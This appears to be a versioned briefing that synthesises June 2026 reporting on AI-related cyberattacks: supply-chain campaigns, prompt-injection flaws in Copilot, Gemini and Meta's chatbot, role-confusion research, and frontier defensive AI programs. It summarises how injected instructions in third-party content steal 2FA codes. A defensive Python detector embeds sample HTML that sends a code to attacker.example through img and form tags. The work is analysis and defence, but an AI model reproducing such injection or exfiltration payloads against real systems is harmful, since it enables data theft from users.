AI as Attack Tool and Attack Target: May 2026 Cybersecurity Moment

Version 19

2026-06-23 08:15 UTC · 615 items

Changes since v18

OpenAI's Daybreak launch on June 22 is the major new development: GPT-5.5-Cyber achieves 85.6% on CyberGym, the highest single-model score measured and above Mythos 5, alongside Trusted Access for Cyber agreements with seven governments and a Codex Security record of 30 million commits scanned, making OpenAI a major actor in this thread for the first time [^32516][^32657]. Role confusion research reported by Willison adds a structural mechanism for why prompt injection defenses keep failing (models infer privilege from text style rather than genuinely perceiving roles), quantifies a partial mitigation (destyling drops attack success from 61% to 10%), and deepens his earlier structural critique [^32628]. The AuthMind/CETAS governance critique now applies to both Glasswing and Daybreak, because OpenAI's program is likewise outside CAISI review.

What

AI is being weaponized by attackers and exploited as an attack surface, while two competing frontier-AI defensive programs, Anthropic's Glasswing/Mythos and OpenAI's newly launched Daybreak/GPT-5.5-Cyber, operate under self-certified access controls with no common governance standard or external audit [19][22]. The Mini Shai-Hulud supply chain campaign compromised 1,000+ SaaS environments and led to the theft of ~3,800 internal GitHub repositories [1][2]; a maximum-critical M365 Copilot vulnerability allowed 2FA code theft via prompt injection [8]; and Google sued the Chinese Outsider Enterprise network over a phishing-as-a-service operation priced at $88/week, which the FBI links to 3.87 million stolen credit card numbers [16]. OpenAI's GPT-5.5-Cyber achieved 85.6% on CyberGym, the highest single-model score measured and above Claude Mythos 5, and comes with Trusted Access for Cyber agreements with seven governments [22][24]. Role confusion research reported by Willison adds a structural explanation for why prompt injection defenses keep failing: LLMs parse privilege from text style rather than prompt position, and changing that style alone drops attack success from 61% to 10% [9].

Why it matters

Two of the highest-scoring offensive cyber tools ever benchmarked are now deployed under self-certified access programs with no external audit or common governance framework, while the structural vulnerability enabling most documented LLM attacks (models cannot reliably distinguish trusted from untrusted input) remains unresolved. Autonomous AI cyber capability is doubling roughly every 4.7 months [20], and MITRE ATT&CK and MITRE ATLAS, the frameworks defenders rely on, lack coverage for the autonomous agentic orchestration this capability class enables [23].
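
To make the 4.7-month doubling figure concrete, the following is a minimal sketch that converts a doubling time into a growth multiple over a chosen horizon. It assumes the trend is a clean exponential, which the reported figure does not guarantee; the function name `growth_factor` is illustrative and does not come from any cited source.

```python
def growth_factor(months: float, doubling_months: float = 4.7) -> float:
    """Multiple by which capability grows after `months`,
    assuming a steady exponential trend with the given doubling time."""
    if doubling_months <= 0:
        raise ValueError("doubling_months must be positive")
    return 2.0 ** (months / doubling_months)


if __name__ == "__main__":
    # Print the implied multiple for a few horizons (in months).
    for horizon in (4.7, 6, 12):
        print(f"{horizon:>4} months: x{growth_factor(horizon):.2f}")
```

Under that assumption, twelve months corresponds to a bit under a sixfold increase.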

Open questions

Ars Technica reports LLM providers have no fundamental fix for prompt injection [8]; role confusion research identifies style-based privilege parsing as the structural cause and destyling as a partial mitigation [9] — has any major provider announced an architectural response, or are defenses still per-vector patches?
OpenAI restricts GPT-5.5-Cyber to 'verified defenders with authorized workflows' and Anthropic's Glasswing has structured partner access, but neither program is subject to CAISI review [22][19][25] — is any common governance standard for frontier cyber AI deployment being developed?
The CSA confirmed both MITRE ATT&CK and MITRE ATLAS lack coverage for autonomous agentic orchestration [23]. Has either framework body publicly responded or committed to a timeline for addressing it?
OpenAI argues AI has shifted the bottleneck from finding to patching vulnerabilities [22] — if this holds equally for attackers, what does deploying the highest-scoring CyberGym model imply for net offense-defense balance?

Narrative

The Mini Shai-Hulud supply chain campaign, launched by threat actor TeamPCP on May 11, 2026, compromised more than 1,000 SaaS environments [1], stole approximately 3,800–4,000 internal GitHub repositories via a poisoned VS Code extension [2][3], and breached 30 EU institutions via the Trivy container scanner [4]. Concurrent campaigns hit adjacent developer trust surfaces: an AntV ecosystem attack faked Sigstore provenance badges across 600+ packages [5], TrapDoor compromised 34+ packages across npm, PyPI, and crates.io [6], and 73 Microsoft-signed packages contained credential-stealing code that activated when developers opened them in AI coding agents [7]. GitHub removed the packages, citing a terms-of-service violation; Ars Technica argued that this framing misled users about potential system compromise [7].

AI-connected products are under attack at multiple layers. A maximum-critical vulnerability in Microsoft 365 Copilot allowed attackers to steal 2FA codes and sensitive email data by embedding instructions in third-party content Copilot processes, using HTML img and form tags to route stolen data to attacker-controlled servers [8]. Ars Technica reports providers have responded with ad hoc guardrails rather than any architectural fix, characterizing current LLMs as having incurable gullibility to injection [8]. Role confusion research reported by Simon Willison provides a structural explanation: LLMs parse whether text is privileged based on its style rather than its actual position in the prompt hierarchy, and simply changing the style of injected text — a change nearly invisible to humans — drops average attack success from 61% to 10% [9]. Willison concludes that without genuine role perception in LLM architectures, injection defense is a perpetual whack-a-mole game. SafeBreach has documented three separate bypasses of Google Gemini's defenses via voice injection, Calendar invites, and WhatsApp Fake Context Alignment across six messaging platforms [10][11][12]. Meta issued an emergency patch after its AI support chatbot was exploited to take over high-profile Instagram accounts, including the Obama White House account; Willison argued the core failure was Meta granting account-modification authority without identity verification, not prompt injection per se [13][14].
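
One narrow, per-vector check suggested by the Copilot case is to flag tags in third-party content that can send data to an external server. The sketch below uses Python's standard `html.parser`; the class and function names are hypothetical, it looks only at `img` `src` and `form` `action`, and it is neither the fix Microsoft shipped nor a defense against prompt injection in general.

```python
from html.parser import HTMLParser


class ExfilTagFinder(HTMLParser):
    """Collects (tag, url) pairs for tags that can carry data to a remote host."""

    # Tag name -> attribute holding the outbound URL (illustrative, not exhaustive).
    WATCHED = {"img": "src", "form": "action"}

    def __init__(self) -> None:
        super().__init__()
        self.hits: list[tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names before calling this.
        wanted = self.WATCHED.get(tag)
        if wanted is None:
            return
        for name, value in attrs:
            if name == wanted and value:
                self.hits.append((tag, value))


def find_exfil_candidates(untrusted_html: str) -> list[tuple[str, str]]:
    """Return every img/form URL found in untrusted HTML, in document order."""
    finder = ExfilTagFinder()
    finder.feed(untrusted_html)
    finder.close()
    return finder.hits


if __name__ == "__main__":
    sample = (
        '<p>Quarterly report</p>'
        '<img src="https://attacker.example/pixel?code=123456">'
        '<form action="https://attacker.example/collect"></form>'
    )
    for tag, url in find_exfil_candidates(sample):
        print(tag, url)
```

A check like this is exactly the kind of ad hoc guardrail the paragraph describes: it closes one channel and leaves the underlying confusion between trusted and untrusted text untouched.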

AI is also being deployed at scale to run attacks with minimal technical skill. Google sued the Chinese Outsider Enterprise network for operating phishing-as-a-service toolkits on Telegram at $88/week, with 290+ pre-built templates requiring no coding skill and including instructions for using Gemini to build fake websites impersonating Google, YouTube, banks, and government agencies [15][16]. The FBI links the network to 3.87 million stolen credit card numbers and an estimated $1.9 billion in losses since July 2023 [16]. Anthropic's Frontier Red Team found corroborating aggregate data across 832 banned malicious accounts: 67.3% used AI to write malware, AI use in post-compromise attack phases rose 8.9%, and medium-to-high risk actors grew from 33% to 56% — roughly a 1.7-fold increase — with traditional signals no longer reliably separating sophisticated from novice attackers [17][18].
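
The ratios quoted in the narrative can be checked with simple arithmetic. The helper names below are illustrative; the inputs are the percentages reported in the text (33% to 56% for medium-to-high risk actors, and 61% to 10% for injection success after destyling).

```python
def fold_change(before: float, after: float) -> float:
    """How many times larger `after` is than `before`."""
    return after / before


def relative_reduction(before: float, after: float) -> float:
    """Fraction of the original value that was removed."""
    return (before - after) / before


if __name__ == "__main__":
    # Share of medium-to-high risk actors, in percent.
    print(f"fold change: {fold_change(33, 56):.2f}")
    # Average injection success before and after destyling, in percent.
    print(f"relative reduction: {relative_reduction(61, 10):.1%}")
```

The first figure rounds to the 1.7-fold increase cited above; the second shows that the drop from 61% to 10% removes a little over four fifths of successful attacks while still leaving one in ten.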

Two competing frontier AI programs are now deployed for defense with contested governance. Anthropic's Project Glasswing operates with approximately 200 partners in 15+ countries across critical infrastructure sectors, with Claude Mythos as the first AI to autonomously complete both UK offensive cyber ranges [19][20]. OpenAI launched Daybreak on June 22, including GPT-5.5-Cyber, which achieves 85.6% on CyberGym (the highest single-model score measured and above Mythos 5), and Codex Security, which has scanned 30 million commits across 30,000+ codebases since March with over 70,000 findings manually confirmed fixed [21][22]. OpenAI signed Trusted Access for Cyber agreements with Australia, Canada, France, Germany, Japan, South Korea, and EU institutions including ENISA, restricts GPT-5.5-Cyber to verified defenders with authorized workflows, and argues that AI has shifted the bottleneck from finding vulnerabilities to patching them at AI-accelerated speed [22]. Neither Glasswing nor Daybreak is subject to CAISI review, and the Cloud Security Alliance has confirmed that both MITRE ATT&CK and MITRE ATLAS lack coverage for the autonomous agentic orchestration attack mode both programs enable [23].

Timeline

2026-05-05: NIST's CAISI formalized as US pre-deployment AI compliance gate with agreements covering Google, Microsoft, and xAI [31]
2026-05-11: TeamPCP launches Mini Shai-Hulud; 160+ npm and PyPI packages compromised; two OpenAI employee devices breached with code-signing certificates exfiltrated [32][33][34]
2026-05-11: Google GTIG intercepts the first confirmed criminal AI-generated zero-day targeting a hardcoded 2FA trust assumption [26][35][36]
2026-05-13: AISI evaluates Claude Mythos Preview as first AI to autonomously complete both UK offensive cyber ranges; autonomous AI cyber capability doubling every 4.7 months [32][37][20]
2026-05-18: TeamPCP advertises Mistral AI source code — 450 repositories — for sale at $25,000; Mistral confirms impact [38][39][40]
2026-05-20: GitHub confirms theft of approximately 3,800–4,000 internal repositories via a poisoned Nx Console VS Code extension [2][3][41]
2026-05-24: CERT-EU confirms European Commission breach across 30 EU institutions via Trivy; Mandiant quantifies 1,000+ SaaS compromises; TrapDoor hits 34+ packages; AntV ecosystem fakes Sigstore badges across 600+ packages [4][1][6][5]
2026-05-26: Starlette/ASGI critical vulnerability affects 325M weekly downloads including MCP servers; Microsoft patches four Copilot CVEs following documented data exfiltration [42][43][44]
2026-05-29: Meta issues emergency patch after its AI support chatbot is exploited to take over high-profile Instagram accounts including the Obama White House account [13][14]
2026-06-02: Anthropic expands Project Glasswing to ~200 partners in 15+ countries; reports 10,000+ critical flaws found; releases Claude Security on Opus 4.8 [19]
2026-06-03: Anthropic FRT publishes empirical data on 832 banned attackers: medium-to-high risk actors up 1.7-fold; AI use in post-compromise phases rose 8.9%; MITRE ATT&CK agentic gap identified [17][18]
2026-06-04: SafeBreach documents third Gemini bypass via WhatsApp 'Fake Context Alignment'; Google DeepMind documents malicious websites that detect and target AI agents across six attack types [12][27][10][11]
2026-06-05: Simon Willison introduces 'Lethal Trifecta' framework; argues OpenAI Lockdown Mode addresses only the exfiltration leg of the structural condition enabling LLM data theft [28]
2026-06-08: 73 Microsoft-signed packages with AI-agent-triggered credential stealers blocked; GitHub attributes the removal to a terms-of-service violation [7]
2026-06-11: CSA gap analysis confirms neither MITRE ATT&CK nor MITRE ATLAS fully covers autonomous agentic orchestration [23]
2026-06-12: Google sues Chinese Outsider Enterprise for using Gemini to run phishing-as-a-service: $88/week, 290+ templates, $1.9B in estimated losses, 3.87M stolen credit card numbers per FBI [15][45][16]
2026-06-16: Ars Technica reports maximum-critical M365 Copilot vulnerability allowed 2FA code theft via prompt injection; researchers characterize prompt injection as structurally unfixable in current LLMs [8]
2026-06-22: OpenAI launches Daybreak: GPT-5.5-Cyber achieves 85.6% on CyberGym (highest single-model score, above Mythos 5); Codex Security has scanned 30M+ commits; Trusted Access for Cyber signed with 7 governments including ENISA [21][22][24]
2026-06-22: Role confusion research reported by Willison: LLMs parse privilege from text style rather than prompt position; destyling drops injection success from 61% to 10%; defense characterized as 'perpetual whack-a-mole' without genuine role perception [9]

Perspectives

SafeBreach Labs

Has documented three successful bypasses of Google Gemini's prompt injection defenses: voice/audio injection, Google Calendar invites, and WhatsApp 'Fake Context Alignment' across six messaging platforms.

Evolution: Consistent; the pattern of repeated circumvention of individually patched defenses independently reinforces the role confusion structural critique.

[10][11][12]

Anthropic

Expanding Project Glasswing to ~200 partners under a proactive-defense rationale — controlled deployment under structured conditions is preferable because Mythos-class capability will be widely available within 6–12 months — while FRT empirical data documents AI democratizing sophisticated post-compromise attack techniques.

Evolution: GPT-5.5-Cyber's reported outperformance of Mythos 5 on CyberGym (a result reported by OpenAI and not independently verified) suggests the competitive timeline Anthropic cited for early deployment is real, though it also means Anthropic's capability lead has narrowed.

[19][17][18][24]

OpenAI

Launched Daybreak on June 22 with GPT-5.5-Cyber (85.6% CyberGym, highest single-model score, above Mythos 5) and Patch the Planet; argues AI has shifted the bottleneck from discovering to patching vulnerabilities; restricts GPT-5.5-Cyber to verified defenders with authorized workflows under Trusted Access for Cyber agreements with seven governments.

Evolution: New to this thread; enters as a major actor deploying frontier cyber AI under a human-oversight-centered, defense-first framing that closely parallels Anthropic's Glasswing rationale but similarly lacks an independent governance structure.

[21][22][24]

GitHub / Microsoft

Characterized the theft of ~3,800 internal repositories as having limited impact, attributed the removal of 73 malicious packages to a terms-of-service violation, and patched a maximum-critical Copilot vulnerability enabling 2FA theft that researchers frame as a symptom of prompt injection's structural unfixability.

Evolution: Consistent; the June 16 Copilot disclosure extends a pattern of per-incident responses without addressing the structural critique.

[2][7][8]

Google (GTIG / DeepMind / Legal)

GTIG confirmed the first criminal AI-generated zero-day; DeepMind documented malicious websites targeting AI agents; Google Legal sued Outsider Enterprise for using Gemini to deliver phishing-as-a-service causing an estimated $1.9 billion in losses per FBI attribution.

Evolution: Consistent; the Outsider Enterprise lawsuit adds a legal enforcement dimension while illustrating that Google's own model was weaponized against users.

[26][27][15][16]

Simon Willison

Introduced the 'Lethal Trifecta' (private data access + untrusted content + exfiltration channel) as the structural condition enabling LLM data theft; now reports that LLMs parse privilege from text style rather than prompt position, meaning injection defense is a 'perpetual whack-a-mole game' unless LLMs achieve genuine role perception.

Evolution: Role confusion research deepens his structural critique: the problem is not just the trifecta of enabling conditions but the absence of genuine role perception in current LLM architectures.

[28][13][9]
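
The 'Lethal Trifecta' condition described above can be expressed as a simple configuration check. This is a minimal sketch under stated assumptions: the `AgentConfig` fields and the function name are hypothetical labels for the three legs Willison names, not part of any vendor's API, and a real deployment would need to derive these flags from its actual tool and data permissions.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class AgentConfig:
    """Hypothetical capability flags for an LLM agent deployment."""
    reads_private_data: bool         # e.g. mailbox, files, account records
    ingests_untrusted_content: bool  # e.g. web pages, inbound email, invites
    can_send_data_out: bool          # e.g. HTTP requests, rendered images, outbound mail


def has_lethal_trifecta(cfg: AgentConfig) -> bool:
    """True only when all three enabling conditions are present together."""
    return (
        cfg.reads_private_data
        and cfg.ingests_untrusted_content
        and cfg.can_send_data_out
    )


if __name__ == "__main__":
    assistant = AgentConfig(True, True, True)
    locked_down = AgentConfig(True, True, False)  # exfiltration leg removed
    print(has_lethal_trifecta(assistant))
    print(has_lethal_trifecta(locked_down))
```

Removing any one leg makes the check return false, which is why a control that addresses only the exfiltration leg changes the outcome of this check without addressing the role confusion critique.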

AISI (UK AI Security Institute)

Claude Mythos is the first AI to autonomously complete both UK offensive cyber ranges; autonomous AI cyber capability is doubling approximately every 4.7 months, warranting urgent governance attention.

Evolution: Consistent; OpenAI's reported CyberGym outperformance of Mythos 5, if independently confirmed, would indicate the capability ceiling has risen further since AISI's evaluation.

[20][29]

AuthMind + Turing Institute CETAS

The CAISI voluntary framework evaluates only submitted models, not deployment programs; Anthropic's Glasswing expansion to ~200 partners without CAISI review is precisely the unaudited frontier deployment their governance critique describes.

Evolution: OpenAI's Daybreak launch with seven government partnerships, also outside CAISI review, extends the same governance critique to a second major actor simultaneously.

[25][30][29][22]

Tensions

Ars Technica argues current LLMs have no fundamental fix for prompt injection; role confusion research confirms the structural cause (style-based privilege parsing) and identifies a partial mitigation, destyling, which drops attack success from 61% to 10% and which no provider has announced adopting [8][9].
GitHub attributed the removal of 73 malicious Microsoft-signed packages to a terms-of-service violation; Ars Technica argues this framing misled users about potential system compromise, consistent with GitHub's earlier minimized characterization of the internal repository theft [7][2].
Anthropic argues deploying Glasswing to ~200 partners under controlled conditions is preferable to waiting for competitors to deploy Mythos-class capability without safeguards; AuthMind and CETAS argue this expansion without CAISI review is precisely the unaudited frontier deployment their governance critique describes [19][25].
Willison concludes OpenAI Lockdown Mode's existence implies ChatGPT in default settings does not robustly block determined exfiltration; OpenAI has not directly contested this characterization [28].
Willison argues the Meta AI Instagram exploit 'hardly even qualifies as prompt injection' because the real failure was Meta granting account-modification authority without identity verification, while Ars Technica frames it as a prompt injection attack demonstrating AI's susceptibility to manipulation [13][14].
OpenAI's Daybreak and Anthropic's Glasswing both claim structured defender-only access for frontier cyber AI, but neither is subject to CAISI review or a common external standard; governance critics argue two programs competing on capability while self-certifying access controls creates the governance gap CAISI was designed to prevent [22][19][25].

Sources

[1] TeamPCP Supply Chain Campaign: Update 006 - CERT-EU Confirms European Commission Cloud Breach, Sportradar Details Emerge, and Mandiant Quantifies Campaign at 1,000+ SaaS Environments — reactive:ai-security-nexus
[2] Nx Console 18.95.0 Incident: How TeamPCP Breached GitHub — reactive:ai-security-nexus
[3] GitHub just confirmed that attackers stole about 3,800 internal repositories after a poisoned VS Code extension compromi… — Rohan Paul Twitter (2026-05-20)
[4] European Commission cloud breach: a supply-chain compromise — reactive:ai-security-nexus
[5] Mini Shai-Hulud Returns: 600+Malicious npm Packages Fake Sigstore Badges in AntV Ecosystem Attack — reactive:ai-security-nexus
[6] TrapDoor Crypto Stealer Supply Chain Attack Hits 34 Packages... — reactive:ai-offensive-cyber
[7] For the 2nd time in weeks, Microsoft packages laced with credential stealer — Ars Technica AI (2026-06-08)
[8] Critical Copilot vulnerability allowed hackers to steal 2FA code from users — Ars Technica AI (2026-06-16)
[9] Prompt Injection as Role Confusion — Simon Willison (2026-06-22)
[10] Exploiting Gemini via Prompt Injection | SafeBreach Original Research — reactive:ai-security-nexus
[11] Invitation Is All You Need: Hacking Gemini | SafeBreach — reactive:ai-security-nexus
[12] 😺 Google Gemini got hijacked via WhatsApp — The Neuron (2026-06-04)
[13] Hackers duped Meta AI support chatbot to steal celebrity Instagram accounts — Ars Technica AI (2026-06-01)
[14] Hackers Simply Asked Meta AI to Give Them Access to High-Profile Instagram Accounts. It Worked — Simon Willison (2026-06-01)
[15] Google sues Chinese cybercrime network that used Gemini to automate scams — Ars Technica AI (2026-06-12)
[16] 😺 Google sued the people spamming your phone — The Neuron (2026-06-16)
[17] What we learned mapping a year’s worth of AI-enabled cyber threats — Anthropic News (2026-06-03)
[18] Gap: Anthropic mapped 832 banned accounts onto MITRE ATT&CK. AI in the back half of attacks jumped 8.9%; phishing dr... — reactive:ai-security-nexus (2026-06-14)
[19] Expanding Project Glasswing — Anthropic News (2026-06-02)
[20] Our evaluation of Claude Mythos Preview's cyber capabilities — reactive:frontier-ai-cyber-capabilities
[21] Patch the Planet: a Daybreak initiative to support open source maintainers — OpenAI Blog (2026-06-22)
[22] Daybreak: Tools for securing every organization in the world — OpenAI Blog (2026-06-22)
[23] MITRE ATT&CK and ATLAS Agentic Gap Analysis - Lab Space — reactive:ai-security-nexus
[24] OpenAI’s new GPT-5.5-Cyber just beat Mythos 5 on CyberGym. — Rohan Paul Twitter (2026-06-22)
[25] When a Lab Withholds Its Best Model: What the Claude Mythos System Card Signals for Cybersecurity — reactive:ai-security-nexus
[26] Google Researchers Detect First AI-Built Zero-Day Exploit in Cyberattack - Bloomberg — reactive:ai-offensive-cyber
[27] This Google DeepMind’s paper is a serious warning for anyone using autonomous agents today. — Rohan Paul Twitter (2026-06-04)
[28] OpenAI Help: Lockdown Mode — Simon Willison (2026-06-05)
[29] AISI: autonomous AI cyber capability now doubling every 4.7 months — reactive:ai-offensive-cyber
[30] Claude Mythos: What Does Anthropic's New Model Mean for the ... — reactive:ai-security-nexus
[31] US government expands vetting of frontier AI models for security risks — reactive:ai-security-nexus
[32] Our response to the TanStack npm supply chain attack — OpenAI Blog (2026-05-13)
[33] Mini Shai-Hulud: TeamPCP compromette 160+ pacchetti npm e PyPI in un supply chain attack che ha colpito TanStack, Mistra... — reactive:ai-security-nexus (2026-05-19)
[34] A Self-Spreading Supply Chain Attack Compromises TanStack npm ... — reactive:ai-security-nexus
[35] Google Detects First AI-Generated Zero-Day Exploit - SecurityWeek — reactive:ai-offensive-cyber
[36] Google spotted an AI-developed zero-day before attackers could use it | CyberScoop — reactive:ai-offensive-cyber
[37] How fast is autonomous AI cyber capability advancing? — reactive:ai-offensive-cyber (2026-05-13)
[38] TeamPCP vende repo Mistral AI dopo attacco TanStack su OpenAI — reactive:ai-security-nexus (2026-05-18)
[39] Hackers threaten to leak Mistral files online — AI giant confirms breach, but not what data is involved | TechRadar — reactive:ai-offensive-cyber
[40] TeamPCP Claims Sale of Mistral AI Repositories Amid Mini Shai ... — reactive:ai-security-nexus
[41] GitHub Says 3,800 Repositories Breached—TeamPCP Hackers ... — reactive:ai-security-nexus
[42] Millions of AI agents imperiled by critical vulnerability in open source package — Ars Technica AI (2026-05-26)
[43] Microsoft 365 Copilot Information Disclosure CVEs (CVE-2026-26129, CVE-2026-26164, CVE-2026-33111) | PointGuard AI — reactive:ai-security-nexus
[44] CVE-2026-26137: Microsoft 365 Copilot SSRF Vulnerability — reactive:ai-security-nexus
[45] Google Sues to Stop Chinese Cybercrime Group from Using Its A.I. — reactive:ai-security-nexus